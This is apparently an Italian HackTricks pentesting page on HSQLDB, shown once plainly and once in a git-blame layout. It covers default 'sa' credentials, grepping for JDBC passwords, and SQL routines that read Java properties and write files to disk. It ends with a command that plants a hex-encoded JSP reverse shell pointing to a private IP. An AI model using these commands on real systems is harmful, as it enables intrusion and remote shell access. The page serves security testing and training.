hacktricks/network-services-pentesting/9001-pentesting-hsqldb.md

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}


# Informazioni di base

**HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\)** è il principale sistema di database relazionali SQL scritto in Java. Offre un motore di database multithread veloce e di piccole dimensioni con tabelle in memoria e su disco e supporta modalità incorporate e server.

**Porta predefinita:** 9001
```text
9001/tcp open  jdbc      HSQLDB JDBC (Network Compatibility Version 2.3.4.0)
```
# Informazioni

### Impostazioni Predefinite

Nota che per impostazione predefinita questo servizio è probabilmente in esecuzione in memoria o è legato a localhost. Se lo hai trovato, probabilmente hai sfruttato un altro servizio e stai cercando di elevare i privilegi.

Le credenziali predefinite sono solitamente `sa` con una password vuota.

Se hai sfruttato un altro servizio, cerca possibili credenziali usando
```text
grep -rP 'jdbc:hsqldb.*password.*' /path/to/search
```
Note il nome del database con attenzione - ne avrai bisogno per connetterti.

# Info Gathering

Connettiti all'istanza del DB scaricando [HSQLDB](https://sourceforge.net/projects/hsqldb/files/) ed estraendo `hsqldb/lib/hsqldb.jar`. Esegui l'app GUI \(eww\) usando `java -jar hsqldb.jar` e connettiti all'istanza utilizzando le credenziali scoperte/deboli.

Nota che l'URL di connessione avrà un aspetto simile a questo per un sistema remoto: `jdbc:hsqldb:hsql://ip/DBNAME`.

# Tricks

## Java Language Routines

Possiamo chiamare metodi statici di una classe Java da HSQLDB utilizzando Java Language Routines. Nota che la classe chiamata deve essere nel classpath dell'applicazione.

Le JRT possono essere `functions` o `procedures`. Le funzioni possono essere chiamate tramite istruzioni SQL se il metodo Java restituisce una o più variabili primitive compatibili con SQL. Vengono invocate utilizzando l'istruzione `VALUES`.

Se il metodo Java che vogliamo chiamare restituisce void, dobbiamo usare una procedura invocata con l'istruzione `CALL`.

## Reading Java System Properties

Crea funzione:
```text
CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'
```
Esegui funzione:
```text
VALUES(getsystemproperty('user.name'))
```
Puoi trovare un [elenco delle proprietà di sistema qui](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).

## Scrivere contenuto su file

Puoi utilizzare il `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` gadget Java situato nel JDK \(caricato automaticamente nel class path dell'applicazione\) per scrivere elementi codificati in esadecimale su disco tramite una procedura personalizzata. **Nota la dimensione massima di 1024 byte**.

Crea procedura:
```text
CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'
```
Esegui procedura:
```text
call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))
```
{% hint style="success" %}
Impara e pratica l'Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Impara e pratica l'Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Supporta HackTricks</summary>

* Controlla i [**piani di abbonamento**](https://github.com/sponsors/carlospolop)!
* **Unisciti al** 💬 [**gruppo Discord**](https://discord.gg/hRep4RUj7f) o al [**gruppo telegram**](https://t.me/peass) o **seguici** su **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Condividi trucchi di hacking inviando PR ai** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos su github.

</details>
{% endhint %}
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`<summary>Support HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

Translated to Italian 2024-02-10 13:03:23 +00:00			`# Informazioni di base`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`HSQLDB \([HyperSQL DataBase](http://hsqldb.org/)\) è il principale sistema di database relazionali SQL scritto in Java. Offre un motore di database multithread veloce e di piccole dimensioni con tabelle in memoria e su disco e supporta modalità incorporate e server.`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			`Porta predefinita: 9001`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00			```text
			`9001/tcp open jdbc HSQLDB JDBC (Network Compatibility Version 2.3.4.0)`
			```
Translated to Italian 2024-02-10 13:03:23 +00:00			`# Informazioni`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`### Impostazioni Predefinite`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`Nota che per impostazione predefinita questo servizio è probabilmente in esecuzione in memoria o è legato a localhost. Se lo hai trovato, probabilmente hai sfruttato un altro servizio e stai cercando di elevare i privilegi.`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			Le credenziali predefinite sono solitamente `sa` con una password vuota.
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`Se hai sfruttato un altro servizio, cerca possibili credenziali usando`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00			```text
			`grep -rP 'jdbc:hsqldb.password.' /path/to/search`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`Note il nome del database con attenzione - ne avrai bisogno per connetterti.`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`# Info Gathering`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			Connettiti all'istanza del DB scaricando [HSQLDB](https://sourceforge.net/projects/hsqldb/files/) ed estraendo `hsqldb/lib/hsqldb.jar`. Esegui l'app GUI \(eww\) usando `java -jar hsqldb.jar` e connettiti all'istanza utilizzando le credenziali scoperte/deboli.
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated to Italian 2024-02-10 13:03:23 +00:00			Nota che l'URL di connessione avrà un aspetto simile a questo per un sistema remoto: `jdbc:hsqldb:hsql://ip/DBNAME`.
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`# Tricks`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`## Java Language Routines`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`Possiamo chiamare metodi statici di una classe Java da HSQLDB utilizzando Java Language Routines. Nota che la classe chiamata deve essere nel classpath dell'applicazione.`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			Le JRT possono essere `functions` o `procedures`. Le funzioni possono essere chiamate tramite istruzioni SQL se il metodo Java restituisce una o più variabili primitive compatibili con SQL. Vengono invocate utilizzando l'istruzione `VALUES`.
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			Se il metodo Java che vogliamo chiamare restituisce void, dobbiamo usare una procedura invocata con l'istruzione `CALL`.
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`## Reading Java System Properties`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`Crea funzione:`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00			```text
			`CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA`
			`DETERMINISTIC NO SQL`
			`EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`Esegui funzione:`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00			```text
			`VALUES(getsystemproperty('user.name'))`
			```
Translated to Italian 2024-02-10 13:03:23 +00:00			`Puoi trovare un [elenco delle proprietà di sistema qui](https://docs.oracle.com/javase/tutorial/essential/environment/sysprop.html).`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`## Scrivere contenuto su file`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			Puoi utilizzare il `com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename` gadget Java situato nel JDK \(caricato automaticamente nel class path dell'applicazione\) per scrivere elementi codificati in esadecimale su disco tramite una procedura personalizzata. Nota la dimensione massima di 1024 byte.
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`Crea procedura:`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00			```text
			`CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))`
			`LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME`
			`'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'`
			```
Translated to Italian 2024-02-10 13:03:23 +00:00			`Esegui procedura:`
GitBook: [master] 20 pages and 40 assets modified 2020-12-02 23:18:31 +00:00			```text
			`call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`{% hint style="success" %}`
			`Impara e pratica l'Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Impara e pratica l'Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`<details>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`<summary>Supporta HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`* Controlla i [piani di abbonamento](https://github.com/sponsors/carlospolop)!`
			`* Unisciti al 💬 [gruppo Discord](https://discord.gg/hRep4RUj7f) o al [gruppo telegram](https://t.me/peass) o seguici su Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Condividi trucchi di hacking inviando PR ai [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos su github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 05:21:39 +00:00			`{% endhint %}`